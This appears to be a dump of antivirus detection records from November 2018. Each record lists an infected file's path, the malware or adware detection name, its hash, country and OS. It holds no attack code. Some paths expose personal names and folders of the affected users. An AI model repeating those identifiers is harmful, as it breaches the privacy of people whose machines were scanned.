  Row(detection=Row(filename='0fc5d175bd2e11c436e7d95c0889ad8c8b59a128', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\0fc5d175bd2e11c436e7d95c0889ad8c8b59a128', filesize=320000, name='Adware/DealPly.76ab21.#M1.#R1'), hash='76ab210cb9007181bbc0d0772322762bfb9c11e4f9b08ab6d7452408ca4e5f2a', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:23:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='صور عيد ميلاد احمد.exe', filepath='d:\\هبه\\صور عيد ميلاد احمد\\صور عيد ميلاد احمد.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='b9409d8e1b382236ea21942e235f81e32c22d45c0c136872420d9cba90f239d8', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:57:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211514-fbdcf8b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-211514-FBDCF8B3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:15:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:27:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:23:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='4720879.vir', filepath='\\\\?\\C:\\Program Files (x86)\\sSuper\\4720879.VIR', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:47:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service.vir', filepath='\\\\?\\C:\\Applications\\Service.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='SG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T04:02:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152014-ff7a0078', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5d9713e5\\AVSCAN-20181104-151919-FAAC7A8E\\AVSCAN-20181104-152014-FF7A0078', filesize=1844000, name='PUA/InstallCore.#M1.#R1'), hash='423193b530b82466c1c001b1347fcac61f8a0f4dd1402e911b85d4458d8bd26b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T17:19:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rlistupdater', filepath='/Volumes/backup/Backups.backupdb/MacBook Pro de erly wilson/2017-09-12-235335/Erly W/Users/erlywilson/Library/Application Support/amc/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='BR', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:25:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xerces-c_2_6.dll', filepath='C:\\AMD\\Win7-32Bit-Radeon-Software-Adrenalin-Edition-17.12.1-Dec11\\Bin\\xerces-c_2_6.dll', filesize=2864000, name='W32/Ramnit.C.#M1.#R1'), hash='b2baa527e6eca6d855ed2201dfbf65a04a887dd3273fb945b339666e6e5cba06', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UCBrowser\\Application\\UCBrowser.exe', parentsize=1225616, timestamp='2018-11-04T11:07:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153541-3c9c6ee6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5aa200c1\\AVSCAN-20181104-153257-26C48B62\\AVSCAN-20181104-153541-3C9C6EE6', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:35:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='i2owb436.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Low\\i2owb436.exe', filesize=128000, name='HEUR/AGEN.1031358.#M1.#R1'), hash='05ef2a5ba87cf6744258137434f14566712d632c88c70e00fa161eb1bd5a7de8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:06:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:04:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=1744000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='1a6cd78ca59a400ec59e5f17a9fc2c9699fa3322a8d6ad0542757bedadac8507', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T22:28:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cfp ndoulo.exe', filepath='G:\\CFP Ndoulo.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:13:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='obfpmxtbmp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\obfpmxtbmp.exe', filesize=75776000, name='WORM/Lodbak.Gen4.#M300.#R300556'), hash='30f8921b830c23bb51450af865dbeb4f4f62509c857a6cab1482c649953f5134', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:07:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0006231f', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0006231f', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T10:48:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsdE8B6.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-04T17:33:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='htccalc.exe', filepath='E:\\Program Files\\Volcano Team\\VolcanoBox\\bin\\HTCCALC.exe', filesize=3392000, name='W32/Sality.AT.#M1.#R1'), hash='b16a7a4ce90fc171865e7f21d412477e5e67e9c536b079fa05ff370cad3ce05e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-171836-710f6dd8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b393e252\\AVSCAN-20181102-171720-6C9F9B2D\\AVSCAN-20181102-171836-710F6DD8', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T16:18:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\OUTLANDER\\OUTLANDER MY17\\TOOL\\VISTAMSV\\ENV\\VISTAMSVJ\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='9cdaa924b376f3103e2749a00849aa492bbb7165f2040811d5447937a4bb95a0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcoded_001', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_001', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:00:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='instmsia.exe', filepath='C:\\Users\\X\\Desktop\\PMPL DATA\\C Drive Data\\Desktop\\all Desktop\\ashok\\Network_ScanGear\\driver\\us_eng\\DISK1\\instmsia.exe', filesize=1600000, name='TR/Patched.Ren.Gen.#M300.#R3369'), hash='9cbe015a4dbccb7ed24978676f9c478bd42201cb22fbec9454fb66517cac58b3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ws483KjNz0mPeM9e.1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T05:40:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='phieu lien lac.exe', filepath='G:\\\xa0\\phieu lien lac.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='eebe47d403a6c587bc4d9a37342fa4a91545fcec230d486d3bfb8780b0ee168f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T09:56:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7za.exe', filepath='C:\\Program Files (x86)\\HTC\\HTC Sync Manager\\7za.exe', filesize=668000, name='W32/Sality.AT.#M1.#R1'), hash='b4bd0ccf3c10641d838cc180d8c0070dea467a52374f69724f592c1eb3ff94e3', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T12:09:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsr18AA.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=8455960, timestamp='2018-11-02T07:41:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='haiti.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\HAITI\\HAITI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dv.exe', filepath='c:\\users\\X\\appdata\\roaming\\dv.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T12:45:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-095719-d53a9dc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e0266957\\AVSCAN-20181102-095607-CAAEAB07\\AVSCAN-20181102-095719-D53A9DC8', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='c960e9e65998fdf3253b52896d66876a438a3908edfa6868d9df546f003c8f32', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:57:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1_16_3_4.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_16_3_4.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='e73cad1b5983d2b243c8bd2d313e990d1b85cd400552df83e089b2b1011422b6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T10:39:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-065936-a00eb1a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-065936-A00EB1A3', filesize=176000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='94b00e30c8968aabd833cc71544a955f1d5cbfc2d1a4fdcdc38e06fbd3d94fa5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:01:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100700-09bf8d90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0992854b\\AVSCAN-20181102-100529-FAE29284\\AVSCAN-20181102-100700-09BF8D90', filesize=52000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='d19bd7f2da863327e656b9ce93017b864026bf34275223203ca3de018cbba767', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:07:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiql.exe', filepath='\\\\?\\C:\\ProgramData\\msiql.exe', filesize=1920000, name='HEUR/AGEN.1027953.#M1.#R1'), hash='90344389f8755d99916fd079cef7e23e7f913126c777a1ff58a52e534bb76a17', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:09:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141029-e0d86db1', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-140941-D691FF95\\AVSCAN-20181102-141029-E0D86DB1', filesize=192000, name='TR/AD.Bulta.Y.#M1.#R1'), hash='e3786ecd97f36eb1160b9eb50df42a58590d307c4b5e962bc7711bab4f8e7882', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:10:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='filesplitterjoiner.exe', filepath='E:\\HBCD\\Programs\\FileSplitterJoiner.exe', filesize=64000, name='BDS/Rogue.766118.#M1.#R1'), hash='ebf5f18b65c3440e24aa171c5a8f60d8321e55351b8dddf02022f102f94c45de', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='b57f63d98e7751525abc028e3d1339fdb186251ce1e42e890bd1d1cf2be8165f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:10:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='install.exe', filepath='d:\\software\\mather bord\\adi1981\\smaxwdm\\w2k_xp\\INSTALL.EXE', filesize=64000, name='W32/Ramnit.C.#M1.#R1'), hash='a74cef33f6c3ce11a2d99bccf116889ef230d4a854309f981af8c53a98e42a85', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:28:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmplavwyjvp', filepath='/tmp/tmplavwyjvp', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='c1c2921c7b766ff595bf4676b42e29bbdc1c06c9d6e994469cbe33849947498f', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T10:52:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered facod', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered facod', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='dc26e9b5291e93bbb8f1e419cf449550fd705fd81d2a415254b31a9604c2a82e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:16:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='! my image.scr', filepath='D:\\! My Image.scr', filesize=0, name='DR/Patched.Ren.Gen.#M1.#R1'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:51:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-065120-5c2fae48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9625a9be\\AVSCAN-20181102-064112-1C8CC88F\\AVSCAN-20181102-065120-5C2FAE48', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082828-a06bafe5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-082828-A06BAFE5', filesize=64000, name='TR/Siggen.64000.7.#M1.#R1'), hash='c030b37c4066998c7686b51d6cd8690308eeeadbec7712a6ae6190b18fd40916', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jkh.open.info.quarter.hvs.xls', filepath='E:\\FreeFiles\\EIAS\\1 кв.2012 ИПР\\JKH.OPEN.INFO.QUARTER.HVS.xls', filesize=1536000, name='W97M/Dldr.Agent.18758.#M1.#R1'), hash='c0807e627861574bf5bdeae0a2a97dedd7b429fc327b20d7f3310dd75a3cc2b6', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:01:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='public.exe', filepath='C:\\Users\\X\\Public.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:16:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autopatch.exe', filepath='\\\\?\\C:\\Program Files\\Gamania\\GamaniaSafe\\AutoPatch.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='d56c4ac37710b87ffb319a706ec10b950f7ce93c665dfb216a63ba9cdf62073e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:37:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmprn1qve7t', filepath='/tmp/tmprn1qve7t', filesize=584000, name='TR/Dropper.VB.b60a2d.#M1.#R1'), hash='b60a2df189b459696768ff978799e748c5b043d1a97652589239b42c76cc2af6', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:53:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0050817.exe', filepath='F:\\System Volume Information\\_restore{008B42F0-35EB-4774-9CDD-66CB64DF5DF2}\\RP28\\A0050817.exe', filesize=768000, name='W32/Sality.AT.#M1.#R1'), hash='e84164404e79bcbf418d54064e013dde4451443d649cf50ef2fca4ba5626a6a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:26:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='GT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Applications\\Service.exe', parentsize=14208000, timestamp='2018-11-02T17:19:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T09:36:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='beieoo4o.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Low\\beieoo4o.exe', filesize=192000, name='TR/Crypt.XPACK.Gen2.#M300.#R100626'), hash='cd6d6e31b9479b31b84242c01aa1562f03a4645e40cfa8284eef8991e8002320', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:42:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029374f', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029374f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:30:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='акт медперсонал.exe', filepath='\\\\?\\F:\\ОТЧЕТЫ БЛАНКИ\\акт медперсонал.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='d0c983396a9ca89213740d36750581c58d0e620280b356f50ed1757f131afc59', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:37:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002923b7', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002923b7', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:07:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsfECB0.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:00:59Z'), dt=datetime.date(2018, 11, 4)),
